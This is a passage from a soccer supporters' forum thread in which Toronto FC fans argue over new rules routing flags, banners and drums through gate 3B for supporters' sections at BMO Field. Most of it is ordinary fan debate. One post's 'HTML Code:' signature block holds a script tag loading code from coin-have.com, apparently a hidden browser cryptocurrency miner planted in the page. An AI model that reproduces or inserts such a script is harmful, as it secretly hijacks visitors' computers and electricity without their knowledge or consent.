Page 2 of 5 FirstFirst 12345 LastLast
    RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by J . View Post
    No, I think we are being sold out. Especially seeing as I dont have tickets in 112, been thrown out for having a flag in 118... this is just another layer of FO crap that is being sanctioned by the RPB president.

really? that's what you think? How are we being 'sold out' ?

here's the honest to god truth -- The FO will do whatever they want, with or without us.

if you were thrown out of 118 for having a flag, then clearly something was amiss. the issue was probably with the people in your section.
    ///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

No, I think we are being sold out. Especially seeing as I dont have tickets in 112, been thrown out for having a flag in 118... this is just another layer of FO crap that is being sanctioned by the RPB president.

Funny enough, the RPB president you are slagging just worked his ass off to make sure that not only RPB but everyone else in the stadium (including you) can bring in flags without problems. What he did benefits not only RPB but you as well and this is how you react?

How about this...how about next time something happens with supporters, RPB does nothing and YOU go and sort things out with the FO and see if they give you the time of day?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Boris View Post

You just need to know where to draw the line with profanity....
    Well, that raises a question from me. I get this weird feeling, when maybe I shouldn't, that I'm going to have an issue with the "Bastards" banner, because someone may consider it swearing. Should I have anything to worry about Sunday?
    [B]75 Mile Bastards[/B]
    [B]Tailgate Team[/B] [B]Underling[/B]
    [B]Season Ticket Holder 110 Row 33 Seat 9[/B] [B]aka The Bastards' Perch[/B]
    [B]Red Patch Boy through and through. :scarf:[/B][SIZE=6][B][COLOR=SeaGreen]
    [/COLOR][/B][/SIZE]

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFC Via Buffalo View Post
    Well, that raises a question from me. I get this weird feeling, when maybe I shouldn't, that I'm going to have an issue with the "Bastards" banner, because someone may consider it swearing. Should I have anything to worry about Sunday?
    nope...

dont worry.
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

This is why it should have just been posted in the members section...in the public forum everything is met with criticism.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

some people have poor intentions when they come to these events, and the organization is very liable for the actions of the crowd. it is in everyones best interests that they try to contain it to certain sections.. u may just want to have a good time, but other's have/will ruin it for you. blame them not rpb/the FO

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by s2cazz View Post
    This is why it should have just been posted in the members section...in the public forum everything is met with criticism.
    i could have but i chose to let all supporters know of the new rules.
    HTML Code:

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

nope...

dont worry.
    Awesome. Doves should be released in your honor on Sunday, Boris.
    [B]75 Mile Bastards[/B]
    [B]Tailgate Team[/B] [B]Underling[/B]
    [B]Season Ticket Holder 110 Row 33 Seat 9[/B] [B]aka The Bastards' Perch[/B]
    [B]Red Patch Boy through and through. :scarf:[/B][SIZE=6][B][COLOR=SeaGreen]
    [/COLOR][/B][/SIZE]

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFC Via Buffalo View Post
    Awesome. Doves should be released in your honor on Sunday, Boris.
    hmmm that may fill my ego..so do it....
    HTML Code:

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Why can't non-supporters groups bring in regular signs? Look at every team in the NHL, MLB, NBA, NFL, CFL.... so on... every section has people bringing in signs and flags.

If someone sitting in 106, or 221, or 143 wants to bring in a "hey mom, im on tv" sign, or CBC (can't beat canada) or something like that, why are TFC preventing this?

Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by s2cazz View Post
    you know what though? i think that the RPB just made strides for anyone wanting to bring a flag or banner in. again, im not in the supports section, but i bring my banner and i've known people who try to bring flags and banners in (for before the game, half time or after the game) we now have a condensed area where these items can be carried through.

no more random slag offs who dont allow ANY signs in
    no more security guards on power trips
    no more confusion

how is this even considered a bad thing? you have ONE location where these items can be inspected for foul language, etc. that's going to contain people who've been trained to know what they're talking about.

my god.. i can't believe someone is giving slack for CONSISTENCY (however misplaced it may seem) from this club!

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Globetrotter View Post
    Why can't non-supporters groups bring in regular signs? Look at every team in the NHL, MLB, NBA, NFL, CFL.... so on... every section has people bringing in signs and flags.

If someone sitting in 106, or 221, or 143 wants to bring in a "hey mom, im on tv" sign, or CBC (can't beat canada) or something like that, why are TFC preventing this?
    this mainly relates to flags banners...signs...i would ask FO.
    I dont think they wouldnt let you in but something the size of a banner or a two stick would intrude on peoples views.

In the supporters section it is expected that youre view would be obstructed at times with flags and banners. I dont see bristol board signs being an issue
    HTML Code:

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I think this is for banners and flags not the signs,but I might be wrong.
    Great love does not exist without joy and without great suffering ,that's why One club is worth only as much as its fans !

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^thanks.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Is the whole south end considered the supporters section or only 112 113 114?

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

a) the issue is supporter's SECTIONS, not 'groups'. anyone in a supporters section can bring in a sign.

b) I don't know why hand held 'Danny 3:16' style signs are not allowed, but personally, meh. not an issue for me

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by NORMAN KRATES View Post
    in the BMO field seating chart...anything designated 'supporters section'
    HTML Code:

Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

you can, it's just a matter of courtesy though. if youre blocking someones view, they ask you to put it down. a friend brought a banner in and they said "you know you cant have that obstructing the other spectators view during the game right?"

ive been to sporting events where there isnt this kind've action taken, and it sucks having to ask someone to put their sign yourself only to be met with attitude.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by NORMAN KRATES View Post

it's the whole south end plus 111, the back half of 110 and 127

(sorry this seating guide is out of date, but the toronto fc website is STILL broken)

Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

i digress though, this gate is only going to be for supporters though? they won't have one specific area designated for all signs/banners to be checked? cause uhhh.. that'd be kinda nice IMO.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by __wowza View Post
    i digress though, this gate is only going to be for supporters though? they won't have one specific area designated for all signs/banners to be checked? cause uhhh.. that'd be kinda nice IMO.
    baby steps.....
    in all reality you can only bring flags, drums, banners if youre in a supporters section so thats why 3b was opened to us.
    HTML Code:

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by billyfly View Post
    Dang. I thought it was a wrought Iron gate....

so did I !!

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I think all banners and flags will be checked at gate 3B ,including NEE even tough there section is on opposite side of the stadium.
    Great love does not exist without joy and without great suffering ,that's why One club is worth only as much as its fans !

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I think that is a whole different issue.

The issue for the supporters section is about big flags, banners and two-sticks. I don't believe the work being done by the supporters groups (all of them not just RPB) was to sort out the conflict that came up at the home opener.

As per the rules, people sitting in the sections you stated are not allowed to bring in these items, but I am not sure where the FO stands on the smaller "cardboard" signs many people take to hockey games.

That being said, from a practical point of view, I am not sure why you would want to. Soccer broadcasts are much wider than hockey broadcasts, the chances of that sign being seen are extremely minimal. But if you still want to do it, if I were you, I would check with the team.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by __wowza View Post

ummm... flags and banners are only allowed in supporters sections, and this gate is for people in supporters sections. There are no flags/banners in non-supporters sections, so why would there need to be another place to check at the gate? See the logic gap?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by denime View Post
    I think all banners and flags will be checked at gate 3B ,including NEE even tough there section is on opposite side of the stadium.
    Wow thats pretty inconvenient for the NEE. They have to check in then go all the way to the opposite end. Seems a little disorganized. I;m sure they'll be able to fix this though.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Parkdale View Post
    ummm... flags and banners are only allowed in supporters sections, and this gate is for people in supporters sections. There are no flags/banners in non-supporters sections, so why would there need to be another place to check at the gate? See the logic gap?
    Logic, what's that?

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

whoooooo!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

AAAARRRGGGHHHHH!!!

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

say what?
    plase explain yourself..

you have no idea the amount of communication that went into getting this sorted out.

IF YOU ARE IN A SUPPORTERS SECTION....YOU GO INTO GATE 3B.

IF YOU ARE IN A SUPPORTERS SECTION...you can bring in flags and banners.

Whats happened in the past is the past...we are working hard in the present to ensure the supporters are taken care of
    So I should forget the past, the past helps highlight the future, so ignoring that would be remiss of me.

What were you communicating to them? That people pay just as much to see us as they do the game? That there are no rogue flags pillaging the soccer mom sections?

Obviously, the FO will do what they want, so why pretend like we have some sort of say in the matter? You are posturing as though you won us a victory, some sort of resolution. The FO told you they were going to do this and now we are being sold like this is a great answer to some problem. Am I supposed to be pleased? They created a problem and are fixing that created problem to suit their needs of keeping track of supporters.

If they told you that you had to sit, would you? Im beginning to think we would.

So, what was the problem exactly? Maybe if you explain that to me it will help.

Anti-FO banners aren't/weren't allowed in? That we were able to go into other gates with flags?... The ushers would stop you from going into 107 with a flag, so that couldnt be the issue could it? Terrorists invented a flag bomb? Flags cause global warming?

What was the problem?

What problem were they fixing?

This is just smoke, mirrors and posturing.

So if you don't mind, explain yourself.